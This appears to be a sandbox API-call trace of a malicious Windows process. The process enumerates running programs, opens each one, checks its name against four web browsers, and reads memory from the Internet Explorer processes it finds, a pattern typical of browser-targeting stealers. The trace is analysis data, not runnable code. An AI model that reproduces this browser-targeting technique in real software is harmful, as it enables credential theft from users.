	[0237.150] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0237.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.151] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0237.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7a2c
	[0237.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.154] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0237.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.155] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.155] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0237.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.156] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.156] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0237.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7a30
	[0237.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.157] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0237.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.158] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.158] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0237.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.159] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.159] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0237.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7a34
	[0237.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.161] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0237.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.161] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.162] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0237.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.162] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.163] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0237.164] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x7a38
	[0237.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.164] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0237.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.165] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.166] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0237.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.167] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.186] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0237.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7a3c
	[0237.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.187] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0237.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.187] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.188] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0237.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.188] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0237.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7a40
	[0237.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.190] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0237.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.191] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.191] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0237.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.192] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0237.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7a44
	[0237.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.194] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0237.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.195] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.196] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0237.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.197] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0237.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x7a48
	[0237.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.201] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0237.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.202] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.202] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0237.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.202] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0237.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7a4c
	[0237.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.204] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0237.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.205] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.205] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0237.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.205] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0237.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7a50
	[0237.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.207] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0237.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.208] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.209] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0237.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.209] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0237.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7a54
	[0237.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.211] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0237.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.212] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.213] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0237.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.216] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0237.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x7a58
	[0237.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.218] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0237.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.219] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.220] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0237.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.221] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0237.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7a5c
	[0237.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.223] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0237.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.224] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.225] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.225] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0237.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.226] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0237.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7a60
	[0237.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.228] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0237.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.229] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.231] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.231] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0237.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.232] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.233] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.234] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7a64
	[0237.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.234] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.235] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.235] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.235] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.236] NtQueryInformationProcess (in: ProcessHandle=0x7a64, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.236] ReadProcessMemory (in: hProcess=0x7a64, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.236] ReadProcessMemory (in: hProcess=0x7a64, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.236] ReadProcessMemory (in: hProcess=0x7a64, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.236] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0237.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x7a68
	[0237.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.238] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0237.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.239] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0237.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.239] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0237.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.239] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.240] NtQueryInformationProcess (in: ProcessHandle=0x7a68, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0237.240] ReadProcessMemory (in: hProcess=0x7a68, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0237.240] ReadProcessMemory (in: hProcess=0x7a68, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0237.240] ReadProcessMemory (in: hProcess=0x7a68, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0237.240] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0237.241] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0237.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7a6c
	[0237.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.242] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0237.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.242] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.243] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0237.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.244] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.244] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0237.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7a70
	[0237.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.247] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0237.247] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.247] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.248] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0237.248] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.248] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.249] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.250] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7a74
	[0237.250] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.250] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.251] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.251] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.251] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.252] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.252] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.252] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.253] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.254] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x7a78
	[0237.254] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.255] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.255] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.255] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.256] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.256] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.256] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.256] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0237.258] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7a7c
	[0237.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.258] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0237.258] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.258] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.259] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0237.259] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.259] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0237.260] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0237.262] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7a80
	[0237.262] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.262] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0237.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.263] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0237.263] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.263] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0237.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0237.264] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
